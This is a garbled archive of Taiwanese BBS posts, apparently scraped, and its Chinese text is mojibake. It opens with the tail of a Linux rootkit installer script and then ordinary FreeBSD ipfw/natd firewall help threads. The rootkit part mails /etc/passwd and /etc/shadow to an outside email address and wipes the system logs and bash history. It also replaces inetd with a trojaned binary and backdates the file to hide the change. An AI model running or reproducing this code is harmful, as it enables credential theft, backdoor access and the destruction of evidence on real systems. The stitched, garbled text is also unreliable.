echo "" >> owned

cat /etc/passwd >> owned

echo "-" >> owned

echo "-" >> owned

if [ -f /etc/shadow ] ; then

 echo "* SHADOW File:" >> owned

echo "" >> owned

 cat /etc/shadow >> owned

 echo "" >> owned

 echo "" >> owned

fi

echo "*********************** EOF ***********************" >> owned

cat owned | mail -s rewt sec0wnz@yahoo.com

rm -f owned

echo "#### cleaning logs...                                              ####"

cd /var/log

:>wtmp 1>/dev/null 2>/dev/null

:>utmp 1>/dev/null 2>/dev/null

:>lastlog 1>/dev/null 2>/dev/null

:>messages 1>/dev/null 2>/dev/null

:>maillog 1>/dev/null 2>/dev/null

:>secure 1>/dev/null 2>/dev/null

:>xferlog 1>/dev/null 2>/dev/null

cd $oldloc

if [ -f /.bash_history ] ; then

 rm -rf /.bash_history

fi

if [ -f /tmp/.bash_history ] ; then

 rm -rf /tmp/.bash_history

fi

echo "" > /root/.bash_history

cd ..

rm -rf lala.tgz

rm -rf lala

if [ -f /usr/sbin/syslogd ] ; then

/usr/sbin/syslogd

else

/sbin/syslogd

fi

killall -HUP inetd

echo "#### heh, done.                                                    ####"

echo "#######################################################################"

echo "#######################################################################"





bindshell.sh Àɮפº®e

=====================

#!/bin/sh

chattr -isa /usr/sbin/inetd

rm -rf /usr/bin/inetd

cp -f /usr/sbin/inetd /usr/bin/inetd

rm -rf /usr/sbin/inetd

mv minegtty /sbin/minegtty

touch -acmr /usr/bin/inetd inetd

mv inetd /usr/sbin/inetd

chmod +x /sbin/minegtty

chmod +x /usr/sbin/inetd

chmod +x rsz

./rsz -t /usr/bin/inetd /usr/sbin/inetd > /dev/null

killall -9 -q inetd

/usr/sbin/inetd

--

¡¸ [Origin:·¦ªL­·±¡] [From: 140.112.198.1] [Login: **] [Post: 27]

4.2-RELEASEªºNAT°µªk¬O¤£¬O§ïÅܤF¤X??

 

--------------------------------------------------------------------------------



==> seawolf.bbs@bbs.cs.nthu.edu.tw (®ü¯T) ªº¤å³¹¤¤´£¨ì:

>§Ú«ö·Ó4.0ªº°µªk,¦b/etc/rc.conf¥[¤J¥H¤U³o´X¦æ

>firewall_enable="YES"           # Set to YES to enable firewall functionality

>firewall_script="/etc/rc.firewall" # Which script to run to set up the firewall



/etc/rc.firewall¤º®e¬°¤U­±¥|¦æ



/sbin/ipfw -f flush

/sbin/ipfw add 100 divert natd all from any to any via de0

/sbin/ipfw add 200 pass all from any to any

/sbin/ipfw add 65534 allow all from any to any



>firewall_type="OPEN"            # Firewall type (see /etc/rc.firewall)

>firewall_quiet="NO"             # Set to YES to suppress rule display

>firewall_logging="NO"           # Set to YES to enable events logging

>firewall_flags=""               # Flags passed to ipfw when type is a file

>natd_program="/sbin/natd"       # path to natd, if you want a different one.

>natd_enable="YES"               # Enable natd (if firewall_enable == YES).

>natd_interface="fxp0"           # Public interface or IPaddress to use.

>natd_flags=""                   # Additional flags for natd.

§ï¦¨

natd_flags="-f /etc/natd.conf"

µM«á /etc/natd.conf (¥u¦³NAT¨S¦³¨ä¥L±±ºÞ)

dynamic (¥u¦³¤@¦æ,¦pªG¥H«áÁٻݼW¥[¥\¯à®É¥i¥Î)

¤£µM´N§ï¦¨natd_flags="-dynamic" ´N¦n¤F



ÁÙ¦³rc.firewall­n°O±o§ï



>gateway_enable="YES"            # Set to YES if this host will be a gateway.

>¦ý¬O±Ò°Êªº®É­Ô«o¥X²{¤F

>ipfw: getsockopt(IP_FW_ADD): Invalid argument

>ªº°T®§,

>µM«á´NÅܦ¨¹ï¤ºªºªºip³£¯à¥¿±`¨Ï¥Î

>server¸òclient³£¤¬ping±o¨ì

>¦ý¬Oclient¹q¸£«o³£¥X¤£¥h¤F,¥u³Ñserver¥¿±`

>man natd¬Ý¨ì¦³¤@¬q»¡­n¦b/etc/rc.conf¥[¤W

>sysctl -w net.inet.ip.forwarding=1

>³o¤@¦æ,¦ý§Ú¹ê¦b¬Ý¤£¤ÓÀ´»yªk¤F

>man sysctl¤S¨S´£¨ì

>§Ú¶·­n­×§ï¤°»ò¶Ü?

--

* Origin: ¤¤¤s¤j¾Ç-¬üÄR¤§®qBBS * From: 211.22.182.202 [¤w³q¹L»{ÃÒ]

IPFW§â§ÚªºÆ[©À·d¶Ã¤F

 

--------------------------------------------------------------------------------



==> ¦b "LOTUS" (lotus.wang@msa.hinet.net) ªº¤å³¹¤¤´£¨ì:

> ½Ð±Ð«e½úrule­È¬O¥Ñ¤p¨ì¤j°õ¦æ ¨º¨ì©³¬O­n¥ý«Ê³¬¦A¥´¶}ÁÙ¬O¥ý¥´¶}¦A«Ê³¬©O

> ¦b¤Uªºrc.firewall¦p¤U À³¸Ó¥u¬O¤@­Ó¤pÆ[©À ¦ý¦b¤U·d¶Ã¤F ¥i¤£¥i¥H½Ð«e½ú«üÂI°g¬z

> ¦b¤U¦³§âkernel ¸Ì­±ªº default_to_accept ®³±¼¤F:

> #rc.firewall:

> /sbin/ipfw -f flush #³o¦æ¤£·|¸ÑÄÀ

> /sbin/ipfw add divert natd all from any to any via vr0 #³o¦æ¬Ý¤£À´ :P

> /sbin/ipfw add 60000 pass all from any to any #60000©Ò¦³³q¹D¥´¶}

> /sbin/ipfw add 59990 deny tcp from any to any 21 #59990Ãö±¼©Ò¦³ftp³q¹D

> /sbin/ipfw add 59980 deny tcp from any to any 23 #59980Ãö±¼telnet³q¹D

> /sbin/ipfw add 59970 pass tcp from 192.168.1.119 to any 23 #59970¥´¶}

> 192.168.1.119ªºtelnet³q¹D



        flush ªº¥Øªº¬Oªì©l¤Æ¡A¤]´N¬O§â¥Ø«e©Ò¦³³W«h©¿²¤¡A­«·s©w¸q·sªº

        divert ³o¦æ¬O­n©Ò¦³·|³q¹L vr0 ³o¶ô¥dªº«Ê¥]³£¥áµ¹ natd ³B²z

        ©³¤U¥|­Ó³W«h¡A¥Ñ¤p¦Ó¤j¬O

        1.¥i³z¹L 192.168.1.119 ¹ï¥~(¥]¬A¦Û¤v) telnet

        2.¸T¤î©Ò¦³ telnet «Ê¥] (1.+2. ==>¥u¯à¥Ñ 192.168.1.119 ¹ï¥~ telnet)

        3.¸T¤î©Ò¦³ ftp «Ê¥]

        4.¥ô¦ó«Ê¥]¥i³q¹L



        µ²ªG¬O¡A¥ô¦ó«Ê¥]¥i³q¹L¡A¤£¹L ftp ¤£¦æ¡Atelnet ¥u¯à192.168.1.119¹ï¥~



--

        ¤@¯ë¨Ï¥ÎªÌªº¤@¯ëñ¦W¡A©ñ¦b¤@¯ë¸Ó©ññ¦WÀɪº¦a¤è¡AÅý§A

        ¹ï¥L¦³µÛ¤@¯ë¼Ò½kªº¦L¶H...

--

 * Origin: ¡¹ ¥æ³q¤j¾Ç¸ê°T¬ì¾Ç¨t BBS ¡¹ (bbs.cis.nctu.edu.tw: 140.113.23.3)